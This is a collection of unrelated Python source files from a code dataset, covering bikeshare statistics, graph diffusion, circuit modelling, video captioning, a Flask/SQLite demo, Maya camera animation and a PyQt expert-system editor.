#\n if month in months:\n pass\n else:\n print('No data available for {}. Please choose between the available months. Please make sure your spelling is correct.'.format(month))\n return None\n if day in ['monday', 'tuesday','wednesday','thursday','friday','saturday','sunday']:\n pass\n else:\n print('No data available for {}. Please make sure your spelling is correct'.format(day))\n return None\n # extract month and day of week from Start Time to create new columns #\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n #month=months.index(month)+1\n df=df[df['month']==(months.index(month)+1)]\n df = df[df['day_of_week'] == day.title()]\n return df\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\ndef station_stats(df, city, month, day):\n \"\"\"Displays statistics on the most popular stations.\"\"\"\n\n print('\\nCalculating The Most Popular Stations...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n start_station=df['Start Station']\n print('The most popular start station in {} on {}s in {} is: '.format(city, day, month))\n print(start_station.value_counts().head(1))\n\n # display most commonly used end station\n end_station=df['End Station']\n print('The most popular end station in {} on {}s in {} is: '.format(city, day, month))\n print(end_station.value_counts().head(1))\n\n # display most frequent combination of start station and end station trip\n mytable = df.groupby(['Start Station','End Station']).size()\n pop_stations=df.groupby(['Start Station','End Station']).size().reset_index().rename(columns={0:'count'})\n most_popular=pop_stations.sort_values(by='count', ascending=False).head(1)\n print('The most popular trip is:')\n print(most_popular)\n\n print(\"\\nThis took %s seconds to calculate.\" % (time.time() - start_time))\n print('-'*40)\n\ndef trip_duration_stats(df, city, month, day):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n trip_duration=df['Trip Duration']\n print('The total travel time for {}s in {} in {} is {} seconds'.format(day, month, city, int(sum(trip_duration))))\n\n corr_days=sum(trip_duration)/(60*60*24)\n print('This corresponds to {} days'.format(int(corr_days)))\n\n # display mean travel time\n print('The avarage travel time per trip for the choosen period is {0:.0f} seconds'.format((sum(trip_duration)/len(trip_duration))))\n\n\n print(\"\\nThis took %s seconds to calculate.\" % (time.time() - start_time))\n print('-'*40)\n\ndef user_stats(df,city):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n print('The distribution of users using our service in this period is the following:')\n print(df['User Type'].value_counts())\n\n\n # Display counts of gender\n if city != 'washington':\n most_common_gender=df['Gender'].mode().values\n print('Most of our users in this period are {}'.format(most_common_gender))\n # Display earliest, most recent, and most common year of birth\n today=date.today()\n latest_byear=df['Birth Year'].max()\n earliest_byear=df['Birth Year'].min()\n most_common_byear=df['Birth Year'].mode().values\n print('The most senior user during the choosen period was born {0:.0f}'.format(earliest_byear))\n print('The youngest user during the choosen period was born {0:.0f}'.format(latest_byear))\n print('Our service seem to be most popular among users born in {} based upon that is the most common birth year among users during the choosen period'.format(most_common_byear))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\ndef passenger_stats(df,city):\n \"\"\"\n Calculates the mean age of passengers travelling during the period choosen by the user\n \"\"\"\n if city != 'washington':\n print('\\nCalculating statistics about travellers...\\n')\n #Calculate the avarage birth date, thereafter calculate how old people born that year are today #\n today=date.today()\n accum_age=0\n agelist=[]\n mean_birth_year=df['Birth Year'].mean()\n #age=today.year - mean_birth_year\n print('The avarage age for passengers travelling during this period in this region is {0:.0f} years'.format(today.year - mean_birth_year))\n\n\ndef main():\n #First time when called apon; define df and set display welcome message variable to true. #\n #This so that welcome message isn't displayed if user makes a mistake and has to reenter values#\n df=None\n disp_welcome_msg=True\n #While loop to give users the possiblity to reenter values when incorrect input has been recognized #\n while df is None:\n input=get_filters(welcome=disp_welcome_msg)\n city, month, day = input\n disp_welcome_msg=False\n df=load_data(city,month,day)\n station_stats(df, city, month, day)\n trip_duration_stats(df, city, month, day)\n user_stats(df,city)\n passenger_stats(df,city)\n #print(df.head(5))\n\n\n\nif __name__ == \"__main__\":\n \tmain()\n","sub_path":"bikeshare copy.py","file_name":"bikeshare copy.py","file_ext":"py","file_size_in_byte":7505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"211252851","text":"import random\nfrom operator import itemgetter\nfrom statistics import mean, stdev\n\nimport numpy as np\n\nfrom diffusion import icm, ltm\n\n\ndef calculate_fitness(g, seeds, model, iterations=10, p=0.01):\n\t\"\"\"\n\tCalculate the fitness for a set of seeds\n\n\t:param g: An ig.Graph object\n\t:param seeds: The set of initial active nodes\n\t:param model: The diffusion model ('icm', 'ltm')\n\t:param iterations: The number of iterations\n\t:param p: The activation probability (used only when model is 'icm')\n\n\t:return: The statistics of the diffusion (mean, min, max, standard deviation)\n\t\"\"\"\n\tif model == 'icm':\n\t\tinfluence_model = icm\n\t\tparams = {'graph': g, 'seeds': seeds, 'p': p}\n\telif model == 'ltm':\n\t\tinfluence_model = ltm\n\t\tparams = {'graph': g, 'seeds': seeds}\n\n\tactivations = []\n\t# Performs the IC or LT\n\tfor i in range(iterations):\n\t\tfitness = influence_model(**params)\n\t\tactivations.append(len(fitness))\n\n\treturn mean(activations), min(activations), max(activations), stdev(activations)\n\n\ndef get_unranked_nodes(g, seeds=None):\n\tn = len(g.vs)\n\td = g.degree()\n\tvindex = [i for i in range(n)]\n\tcut = np.percentile(d, 75)\n\tvertices = sorted(zip(vindex, d), key=lambda x: x[1], reverse=True)\n\tindices = [i[0] for i in vertices if i[1] >= cut]\n\tif seeds:\n\t\tindices = list(set(indices) - set(seeds))\n\trandom.shuffle(indices)\n\treturn indices\n\n\ndef replace_duplicates(chromossome, mapping, seeds, vertices):\n\tduplicates = [(idx, item) for idx, item in enumerate(chromossome) if item in chromossome[:idx]]\n\tused_seeds = [v for v in chromossome if v in seeds]\n\tused_vertices = [v for v in chromossome if v in vertices]\n\tseeds = list(set(seeds) - set(used_seeds))\n\tvertices = list(set(vertices) - set(used_vertices))\n\tfor idx, v in duplicates:\n\t\tif mapping[idx] == 0:\n\t\t\tv = random.choice(vertices)\n\t\t\tvertices.remove(v)\n\t\telse:\n\t\t\tv = random.choice(seeds)\n\t\t\tseeds.remove(v)\n\t\tchromossome[idx] = v\n\n\ndef replace_gene(chromossome, idx, seeds, vertices):\n\tused_seeds = [v for v in chromossome if v in seeds]\n\tused_vertices = [v for v in chromossome if v in vertices]\n\tseeds = list(set(seeds) - set(used_seeds))\n\tvertices = list(set(vertices) - set(used_vertices))\n\tif chromossome.mapping[idx] == 0:\n\t\tif len(vertices) > 0:\n\t\t\tv = random.choice(vertices)\n\t\t\tvertices.remove(v)\n\t\telse:\n\t\t\tv = random.choice(seeds)\n\t\t\tseeds.remove(v)\n\telse:\n\t\tif len(seeds) > 0:\n\t\t\tv = random.choice(seeds)\n\t\t\tseeds.remove(v)\n\t\telse:\n\t\t\tv = random.choice(vertices)\n\t\t\tvertices.remove(v)\n\tchromossome[idx] = v\n\n\ndef fitness_eletism(population, ch1, ch2):\n\tfitness = [(idx, c.fit) for idx, c in enumerate(population.chromossomes)]\n\tnew_individuals = sorted([(ch1.fit, ch1), (ch2.fit, ch2)], key=itemgetter(0))\n\n\tfor fit, ch in new_individuals:\n\t\tif any(fit > f for idx, f in fitness):\n\t\t\tlowest = min(fitness, key=itemgetter(1))\n\t\t\tfitness.remove(min(fitness, key=itemgetter(1)))\n\t\t\tpopulation.chromossomes[lowest[0]] = ch\n\n\ndef parents_eletism(population, ch1, ch2, idx1, idx2):\n\tpopulation.chromossomes[idx1] = ch1\n\tpopulation.chromossomes[idx2] = ch2\n","sub_path":"ga_helper.py","file_name":"ga_helper.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"40428203","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 27 14:13:01 2017\n\n@author: leghtas\n\"\"\"\nimport qutip as qt\nimport scipy.constants as sc\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.linalg as sl\nimport numpy.linalg as nl\nfrom scipy.optimize import minimize, least_squares\nimport numdifftools as nd\nfrom scipy.misc import derivative\nimport circuit as c\nimport sympy as sp\nfrom sympy.parsing.sympy_parser import parse_expr\n\nhbar=c.hbar\npi=c.pi\nphi0=c.phi0\ne=c.e\n\nclass CircuitSnailPA(c.Circuit):\n\n def __init__(self, EC, EL, EJ, alpha, n, NN=1, ECj = None,\n printParams=True):\n \n # from http://arxiv.org/abs/1602.01793\n w, Z, LJ = c.get_w_Z_LJ_from_E(EC, EL, EJ)\n phi = (1/phi0) * (np.sqrt((hbar/2)*Z)) # phiZPF\n n_zpf = (1/(2*e)) * (np.sqrt(hbar/2/Z)) # nZPF\n C = 1/(Z*w)\n L = Z/w\n omega_plasma = 2*pi*24e9\n CJ = 1/(omega_plasma**2*(2*LJ)) # each junction has 2*LJ\n if ECj == None:\n ECj = e**2/2/CJ\n \n # Fixed parameters should be given as class attribute\n self.ECj = ECj\n self.EL = phi0**2/L\n self.EC = e**2/2/C\n self.EJ = EJ\n self.n = n\n self.NN = NN\n self.alpha = alpha\n \n # Varying parameters should be stored in this dictionary\n self.varying_params={'phi_ext_0':0}\n \n self.U_str = 'EL/hbar*pr**2 \\\n -NN*alpha*(EJ/hbar)*cos(ps/NN) \\\n -NN*(n-1)*(EJ/hbar)*cos((NN*phi_ext_0-ps)/n/NN) \\\n -NN*1*(EJ/hbar)*cos(pi-(NN*phi_ext_0-ps)/n/NN)'\n \n self.T_str = '(1/32.)*(hbar/EC)*(2*dpr-dps)**2 \\\n + (1/16.)*(1/NN)*(alpha+1/n)*(hbar/ECj)*(dps)**2'\n \n\n if printParams:\n print(\"w = \"+str(w/2/np.pi*1e-9)+\"GHz\")\n print(\"Z = \"+str(Z)+\"Ohm\")\n print(\"L = \"+str(L*1e9)+\" nH\")\n print(\"C = \"+str(C*1e15)+\" fF\")\n print(\"LJ = \"+str(LJ*1e9)+\" nH\")\n print(\"exp_f = \"+str(1/((L+LJ)*C)**0.5*1e-9)+\" GHz\")\n print(\"EL/h = \"+str(1e-9*self.EL/hbar/2/pi)+\" GHz\")\n print(\"EC/h = \"+str(1e-9*self.EC/hbar/2/pi)+\" GHz\")\n print(\"EJ/h = \"+str(1e-9*self.EJ/hbar/2/pi)+\" GHz\")\n print(\"phi_zpf = \"+str(phi))\n print(\"n_zpf = \"+str(n_zpf))\n print(\"CJ per junction = \"+str(CJ*1e15)+str(\" fF\"))\n print('')\n# print(\"kappab/kappaa limited by CJ = \"+str(1/kappaa_over_kappab))\n \n # Maximum order of the expansion. 4 for Kerr terms\n self.max_order = 4\n super().__init__()\n\n\n def get_freqs_kerrs(self, **kwargs):\n\n res = self.get_normal_mode_frame(**kwargs)\n res1, res2, P, w2 = res\n fs = np.sqrt(w2)/2/np.pi\n\n # calculate Kerrs from polynomial approximation of potential\n\n Hess2U = self.get_HessnL('U', 2, **kwargs)\n Hess3U = self.get_HessnL('U', 3, **kwargs)\n Hess4U = self.get_HessnL('U', 4, **kwargs)\n\n Hess2_r = Hess2U([res1[0], res1[1]], P=P)\n Hess3_r = Hess3U([res1[0], res1[1]], P=P)\n Hess4_r = Hess4U([res1[0], res1[1]], P=P)\n\n popt2 = np.array([Hess2_r[0, 0]/2, Hess2_r[1, 1]/2])\n popt3 = np.array([Hess3_r[0, 0, 0]/6, Hess3_r[1, 1, 1]/6]) # coeff devant le phi**3\n popt4 = np.array([Hess4_r[0, 0, 0, 0]/24, Hess4_r[1, 1, 1, 1]/24]) # coeff devant le phi**4\n\n\n ZPF = popt2**(-1./4)\n\n Xi2 = popt2*(ZPF**2)/2/np.pi # freq en Hz\n Xi3 = 2 * popt3*(ZPF**3)/2/np.pi #coeff devant a^2.a^+\n Xi4 = 6 * popt4*(ZPF**4)/2/np.pi #coeff devant a^2.a^+2\n\n check_Xi2 = w2**0.5/2/np.pi\n\n return res1, res2, Xi2, Xi3, Xi4, check_Xi2\n\n def get_freqs_only(self, **kwargs):\n res = self.get_normal_mode_frame(**kwargs)\n res1, res2, P, w2 = res\n fs = np.sqrt(w2)/2/np.pi\n return fs\n","sub_path":"circuit_example.py","file_name":"circuit_example.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"411604870","text":"# coding: utf-8\n\n'''\n利用显著图来做Temporal Attention,对视频内容进行筛选\n'''\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torchvision.models as models\nfrom builtins import range\nfrom args import vgg_checkpoint\nimport random\nimport math\n\n\nclass EncoderCNN(nn.Module):\n\n def __init__(self):\n super(EncoderCNN, self).__init__()\n self.vgg = models.vgg16()\n self.vgg.load_state_dict(torch.load(vgg_checkpoint))\n # 把VGG的最后一个fc层(其之前的ReLU层要保留)剔除掉\n self.vgg.classifier = nn.Sequential(*list(self.vgg.classifier.children())[:-1])\n\n def forward(self, images):\n return self.vgg(images)\n\n\nclass AttentionLayer(nn.Module):\n '''\n 根据LSTM的隐层状态和视频帧的CNN特征来确定该帧的权重\n '''\n def __init__(self, hidden_size, projected_size):\n '''\n hidden_size: LSTM的隐层单元数目\n frame_embed_size: CNN特征的嵌入维度\n projected_size: 处理LSTM特征和CNN特征的投影空间的维度\n '''\n super(AttentionLayer, self).__init__()\n self.hidden_size = hidden_size\n self.projected_size = projected_size\n self.linear1 = nn.Linear(hidden_size, projected_size)\n self.linear2 = nn.Linear(projected_size, projected_size)\n self.linear3 = nn.Linear(projected_size, 1, bias=False)\n\n def forward(self, h, v):\n bsz, num_frames = v.size()[:2]\n e = []\n for i in range(num_frames):\n x = self.linear1(h) + self.linear2(v[:, i, :])\n x = F.tanh(x)\n x = self.linear3(x)\n e.append(x)\n e = torch.cat(e, 0)\n a = F.softmax(e.view(bsz, num_frames))\n return a\n\n\nclass DecoderRNN(nn.Module):\n\n def __init__(self, frame_size, projected_size, hidden_size,\n num_frames, num_words, vocab):\n '''\n frame_size: 视频帧的特征的大小,一般是4096(VGG的倒数第二个fc层)\n projected_size: 所有特征的投影维度\n hidden_size: LSTM的隐层单元个数\n num_frames: 视觉特征的序列长度,默认是60\n num_words: 文本特征的序列长度,默认是30\n '''\n super(DecoderRNN, self).__init__()\n\n self.frame_size = frame_size\n self.hidden_size = hidden_size\n self.num_frames = num_frames\n self.num_words = num_words\n self.projected_size = projected_size\n self.vocab = vocab\n self.vocab_size = len(vocab)\n\n # frame_embed用来把视觉特征嵌入到低维空间\n self.vs_frame_embed = nn.Linear(frame_size, projected_size)\n self.vs_frame_drop = nn.Dropout(p=0.8)\n self.vf_frame_embed = nn.Linear(frame_size, projected_size)\n self.vf_frame_drop = nn.Dropout(p=0.8)\n self.frame_embed = nn.Linear(projected_size * 2, projected_size)\n self.frame_drop = nn.Dropout(p=0.8)\n\n # attend_layer用来做temporal attention\n self.attend_layer = AttentionLayer(hidden_size, projected_size)\n\n # word_embed用来把文本特征嵌入到低维空间\n self.word_embed = nn.Embedding(self.vocab_size, projected_size)\n self.word_drop = nn.Dropout(p=0.8)\n\n # lstm作为解码器\n self.lstm_cell = nn.LSTMCell(projected_size, hidden_size)\n self.lstm_drop = nn.Dropout(p=0.8)\n # inith用来初始化lstm的hidden\n self.inith = nn.Sequential(\n nn.Linear(projected_size, hidden_size),\n nn.Tanh(),\n nn.Linear(hidden_size, hidden_size),\n nn.Tanh()\n )\n # initc用来初始化lstm的cell\n self.initc = nn.Sequential(\n nn.Linear(projected_size, hidden_size),\n nn.Tanh(),\n nn.Linear(hidden_size, hidden_size),\n nn.Tanh(),\n )\n\n # linear用来把lstm的最终输出映射回文本空间\n self.linear = nn.Linear(hidden_size, self.vocab_size)\n\n self._init_weights()\n\n def _init_weights(self):\n variance = math.sqrt(2.0 / (self.frame_size + self.projected_size))\n self.vs_frame_embed.weight.data.normal_(0.0, variance)\n self.vs_frame_embed.bias.data.zero_()\n self.vf_frame_embed.weight.data.normal_(0.0, variance)\n self.vf_frame_embed.bias.data.zero_()\n self.word_embed.weight.data.uniform_(-1.73, 1.73)\n self.linear.weight.data.uniform_(-0.08, 0.08)\n self.linear.bias.data.zero_()\n\n def _init_lstm_state(self, v):\n mean_v = torch.mean(v, 1).squeeze(1)\n lstm_hidden = F.tanh(self.inith(mean_v))\n lstm_cell = F.tanh(self.initc(mean_v))\n return lstm_hidden, lstm_cell\n\n def forward(self, video_feats, captions, teacher_forcing_ratio=0.5):\n '''\n 传入视频帧特征和caption,返回生成的caption\n 不用teacher forcing模式(LSTM的输入来自caption的ground-truth)来训练\n 而是用上一步的生成结果作为下一步的输入\n UPDATED: 最后还是采用了混合的teacher forcing模式,不然很难收敛\n '''\n batch_size = len(video_feats)\n # 根据是否传入caption判断是否是推断模式\n infer = True if captions is None else False\n\n # Encoding 阶段!\n # vs是视频帧的saliency区域的特征\n vs = video_feats[:, :, :self.frame_size].contiguous()\n vs = vs.view(-1, self.frame_size)\n vs = self.vs_frame_embed(vs)\n vs = self.vs_frame_drop(vs)\n vs_ = vs.view(batch_size, self.num_frames, -1)\n # vf是视频帧的完整特征\n vf = video_feats[:, :, self.frame_size:].contiguous()\n vf = vf.view(-1, self.frame_size)\n vf = self.vf_frame_embed(vf)\n vf = self.vf_frame_drop(vf)\n # vf_ = vf_.view(batch_size, self.num_frames, -1)\n # vr是视频完整特征与显著区域特征的残差\n vr = vf - vs\n # v是视频的著特征与残差特征的拼接\n v = torch.cat([vs, vr], 1)\n v = self.frame_embed(v)\n v = v.view(batch_size, self.num_frames, -1)\n\n # 初始化LSTM隐层\n lstm_hidden, lstm_cell = self._init_lstm_state(v)\n\n # Decoding 阶段!\n # 开始准备输出啦!\n outputs = []\n attens = []\n # 先送一个标记\n word_id = self.vocab('')\n word = Variable(vs.data.new(batch_size, 1).long().fill_(word_id))\n word = self.word_embed(word).squeeze(1)\n word = self.word_drop(word)\n\n for i in range(self.num_words):\n if not infer and captions[:, i].data.sum() == 0:\n # 的id是0,如果所有的word id都是0,\n # 意味着所有的句子都结束了,没有必要再算了\n break\n a = self.attend_layer(lstm_hidden, vs_)\n if infer:\n attens.append(a)\n a = a.unsqueeze(1)\n # 考虑视频的完整特征与显著区域特征的拼接\n V = torch.bmm(a, v).squeeze(1)\n\n t = word + V\n lstm_hidden, lstm_cell = self.lstm_cell(t, (lstm_hidden, lstm_cell))\n lstm_hidden = self.lstm_drop(lstm_hidden)\n\n word_logits = self.linear(lstm_hidden)\n use_teacher_forcing = random.random() < teacher_forcing_ratio\n if use_teacher_forcing:\n # teacher forcing模式\n word_id = captions[:, i]\n else:\n # 非 teacher forcing模式\n word_id = word_logits.max(1)[1]\n if infer:\n # 如果是推断模式,直接返回单词id\n outputs.append(word_id)\n else:\n # 否则是训练模式,要返回logits\n outputs.append(word_logits)\n # 确定下一个输入单词的表示\n word = self.word_embed(word_id).squeeze(1)\n word = self.word_drop(word)\n # unsqueeze(1)会把一个向量(n)拉成列向量(nx1)\n # outputs中的每一个向量都是整个batch在某个时间步的输出\n # 把它拉成列向量之后再横着拼起来,就能得到整个batch在所有时间步的输出\n outputs = torch.cat([o.unsqueeze(1) for o in outputs], 1).contiguous()\n return outputs, attens\n\n def sample(self, video_feats):\n '''\n sample就是不给caption且不用teacher forcing的forward\n '''\n return self.forward(video_feats, None, teacher_forcing_ratio=0.0)\n\n def decode_tokens(self, tokens):\n '''\n 根据word id(token)列表和给定的字典来得到caption\n '''\n words = []\n for token in tokens:\n if token == self.vocab(''):\n break\n word = self.vocab.idx2word[token]\n words.append(word)\n caption = ' '.join(words)\n return caption\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"460826533","text":"#!/bin/python\n\nimport sys\nimport re\n\ndef main(args):\n frames_dict = dict()\n with open(args[1], 'r') as f:\n parse_frames = False\n for cnt, line in enumerate(f):\n if line.startswith(\"\\n\"):\n parse_frames = False\n continue\n line = line.strip()\n if not parse_frames and not line.startswith(\"Frame\"):\n continue\n if line.startswith(\"Frame\"):\n match = re.match(\"Frame (0x[0-9a-fA-F]+) \", line)\n frame_addr = match.group(1)\n parse_frames = True\n frames_dict[frame_addr] = list()\n continue\n for frame in line.split():\n frames_dict[frame_addr].append(\"0x\" + frame)\n for addr, words in frames_dict.items():\n print(\"{addr} {words}\".format(addr=addr, words=\",\".join(words)))\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"ExtractFrames.py","file_name":"ExtractFrames.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"523542461","text":"from maya import cmds, mel\n\n\n\n\n\n\ndef make_vector(start, end):\n return unitize(start - end)\n\n\ndef make_camera(position, rotation=None, target=None):\n \"\"\"\n Create a camera.\n \"\"\"\n\n if target and rotation is None:\n rotation = make_vector(position, target)\n\n c = cmds.camera(position=position, rotation=rotation)\n #c = cmds.camera(position=[0,13,0], rotation=[-90,0,0])\n\n # focalLength = cmds.camera(cameraShape, q=True, fl=True) # Change the film fit type.\n # cmds.camera( cameraShape, e=True, ff='overscan' )\n\n\n\n\ndef main():\n\n panels = cmds.getPanel( all=True )\n cmds.lookThru(c[0])\n\n cmds.setKeyframe(c[0], attribute='translateY', t=['0sec',], value=20)\n cmds.setKeyframe(c[0], attribute='translateY', t=['15sec',], value=0)\n\n cmds.setKeyframe(c[0], attribute='translateZ', t=['3sec',], value=0)\n cmds.setKeyframe(c[0], attribute='translateZ', t=['9sec',], value=20)\n\n cmds.setKeyframe(c[0], attribute='rotateX', t=['0sec',], value=-90)\n cmds.setKeyframe(c[0], attribute='rotateX', t=['15sec',], value=0)\n\n\n\n\n","sub_path":"src/py/render/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"363921274","text":"import turicreate as tc\n\n# Load images (Note: you can ignore 'Not a JPEG file' errors)\ndata = tc.image_analysis.load_images('DATA', with_path=True)\n\n# From the path-name, create a label column\ndata['label'] = data['path'].apply(lambda path: 'wheel' if '/wheel' in path else ('mmb' if '/mmb' in path else 'taillight'))\n\n# Save the data for future use\ndata.save('parts.sframe')\n\n# Explore interactively\ndata.explore()\n","sub_path":"ML_Py/database_gen.py","file_name":"database_gen.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"647922340","text":"from flask import Flask, request\nfrom utils import read_requirements\nfrom utils import random_users\nfrom utils import average_weight_and_height\nfrom utils import mans_in_space_now\n\napp = Flask(\"MyApplication\")\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n\n@app.route('/requirements/')\ndef requiremets():\n return read_requirements()\n\n\n@app.route('/generate-users/')\ndef generate_users():\n query_params = request.args\n default_number_user = 100\n minimum_number_user = 1\n maximum_number_user = 1000\n number_user = query_params.get('number_user') or ''\n if number_user.isdigit():\n number_user = int(number_user)\n if number_user < minimum_number_user or number_user > maximum_number_user:\n number_user = default_number_user\n else:\n number_user = default_number_user\n return random_users(number_user)\n\n\n@app.route('/mean/')\ndef average_output():\n return average_weight_and_height()\n\n@app.route('/space/')\ndef mans_in_space():\n return mans_in_space_now()\n\n@app.route('/phone/create/')\ndef phone_create():\n\n query_params = request.args\n value = int(query_params.get('value'))\n\n\n import sqlite3\n\n con = sqlite3.connect(\"./phones.db\")\n cur = con.cursor()\n sql = f\"\"\"\n INSERT INTO phones\n values (null, {value})\n \"\"\"\n cur.execute(sql)\n con.commit()\n con.close()\n return 'Phone was Created'\n\n@app.route('/phone/delete/')\ndef phones_delete():\n\n import sqlite3\n\n con = sqlite3.connect(\"./phones.db\")\n cur = con.cursor()\n sql = \"\"\"\n DELETE FROM phones;\n \"\"\"\n cur.execute(sql)\n con.commit()\n con.close()\n return 'All phones were deleted'\n\n@app.route('/phone/list/')\ndef phone_list():\n\n import sqlite3\n\n con = sqlite3.connect(\"./phones.db\")\n cur = con.cursor()\n sql = \"\"\"\n SELECT * FROM phones;\n \"\"\"\n cur.execute(sql)\n phones_list = cur.fetchall()\n con.close()\n return str(phones_list)\n\n@app.route('/phone/update/')\ndef phones_update():\n query_params = request.args\n value = int(query_params.get('value'))\n\n import sqlite3\n\n con = sqlite3.connect(\"./phones.db\")\n cur = con.cursor()\n sql = f\"\"\"\n UPDATE phones SET value={value};\n \"\"\"\n cur.execute(sql)\n con.commit()\n con.close()\n return 'All phones were updated'\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"231136280","text":"#!/usr/bin/env python\n\nimport psycopg2\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QDoubleValidator\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtWidgets import QMainWindow\nfrom PyQt5.QtWidgets import QListWidgetItem\nfrom PyQt5.QtWidgets import QTreeWidgetItem\nfrom PyQt5.QtWidgets import QTableWidgetItem\nfrom PyQt5.uic import loadUi\n\nclass Window(QMainWindow):\n def __init__(self, *args, host, port, database, username, password):\n super(Window, self).__init__(*args)\n\n self.conn = psycopg2.connect(host=host, port=port, database=database, user=username, password=password)\n\n loadUi('expert.ui', self)\n\n # Initialize variables tab\n\n self.fillComboWithLemmas(self.uiVariablesCombo, 'variables')\n self.uiVariablesCombo.currentIndexChanged.connect(self.onVariableSelected)\n self.uiCreateVariableButton.clicked.connect(self.onCreateVariableClicked)\n self.uiRenameVariableButton.clicked.connect(self.onRenameVariableClicked)\n self.uiDeleteVariableButton.clicked.connect(self.onDeleteVariableClicked)\n\n self.uiVariableVerifiedCheck.stateChanged.connect(self.onVariableVerified)\n self.uiRangeMinEdit.textEdited.connect(self.checkChanges)\n self.uiRangeMaxEdit.textEdited.connect(self.checkChanges)\n\n self.loadTerms()\n self.uiTermsCombo.currentIndexChanged.connect(self.onTermSelected)\n self.uiAddTermButton.clicked.connect(self.onAddTermClicked)\n self.uiTermsList.clicked.connect(self.onVariableTermSelected)\n self.uiRemoveTermButton.clicked.connect(self.onRemoveTermClicked)\n\n self.loadHedges()\n self.uiHedgesCombo.currentTextChanged.connect(self.onHedgeSelected)\n self.uiAddHedgeButton.clicked.connect(self.onAddHedgeClicked)\n self.uiHedgesList.clicked.connect(self.onVariableHedgeSelected)\n self.uiRemoveHedgeButton.clicked.connect(self.onRemoveHedgeClicked)\n\n self.uiCommitVariableButton.clicked.connect(self.commitVariable)\n\n # Initialize terms tab\n\n self.fillComboWithLemmas(self.uiTerms2Combo, 'terms')\n self.uiTerms2Combo.currentIndexChanged.connect(self.onTerm2Selected)\n self.uiCreateTermButton.clicked.connect(self.onCreateTermClicked)\n self.uiRenameTermButton.clicked.connect(self.onRenameTermClicked)\n self.uiDeleteTermButton.clicked.connect(self.onDeleteTermClicked)\n\n self.uiTermVerifiedCheck.stateChanged.connect(self.onTermVerified)\n\n self.fillComboWithNames(self.uiFunctionCombo, 'functions')\n self.uiFunctionCombo.currentIndexChanged.connect(self.onFunctionSelected)\n\n self.uiPointsEdit.textEdited.connect(self.checkPoints)\n\n self.uiCommitTermButton.clicked.connect(self.commitTerm)\n\n # Initialize hedges tab\n\n self.fillComboWithLemmas(self.uiHedges2Combo, 'hedges')\n self.uiHedges2Combo.currentIndexChanged.connect(self.onHedge2Selected)\n self.uiCreateHedgeButton.clicked.connect(self.onCreateHedgeClicked)\n self.uiRenameHedgeButton.clicked.connect(self.onRenameHedgeClicked)\n self.uiDeleteHedgeButton.clicked.connect(self.onDeleteHedgeClicked)\n\n self.uiHedgeVerifiedCheck.stateChanged.connect(self.onHedgeVerified)\n\n self.uiResultEdit.textEdited.connect(self.checkResult)\n\n self.uiCommitHedgeButton.clicked.connect(self.commitHedge)\n\n # Initialize rules tab\n\n self.fillComboWithNames(self.uiRulesCombo, 'rules')\n self.uiRulesCombo.currentIndexChanged.connect(self.onRuleSelected)\n self.uiCreateRuleButton.clicked.connect(self.onCreateRuleClicked)\n self.uiRenameRuleButton.clicked.connect(self.onRenameRuleClicked)\n self.uiDeleteRuleButton.clicked.connect(self.onDeleteRuleClicked)\n\n self.uiRuleVerifiedCheck.stateChanged.connect(self.onRuleVerified)\n \n self.uiNoteEdit.textEdited.connect(self.onNoteEdited)\n\n self.uiAntecedentNodeTypesCombo.currentIndexChanged.connect(self.onAntecedentNodeTypeSelected)\n self.uiAntecedentNodesCombo.currentIndexChanged.connect(self.onAntecedentNodeValueSelected)\n self.uiAddAntecedentNodeButton.clicked.connect(self.onAddAntecedentNodeClicked)\n self.uiAntecedentTree.currentItemChanged.connect(self.onAntecedentNodeSelected)\n self.uiRemoveAntecedentNodeButton.clicked.connect(self.onRemoveAntecedentNodeClicked)\n\n self.uiConsequentNodeTypesCombo.currentIndexChanged.connect(self.onConsequentNodeTypeSelected)\n self.uiConsequentNodesCombo.currentIndexChanged.connect(self.onConsequentNodeValueSelected)\n self.uiAddConsequentNodeButton.clicked.connect(self.onAddConsequentNodeClicked)\n self.uiConsequentTree.currentItemChanged.connect(self.onConsequentNodeSelected)\n 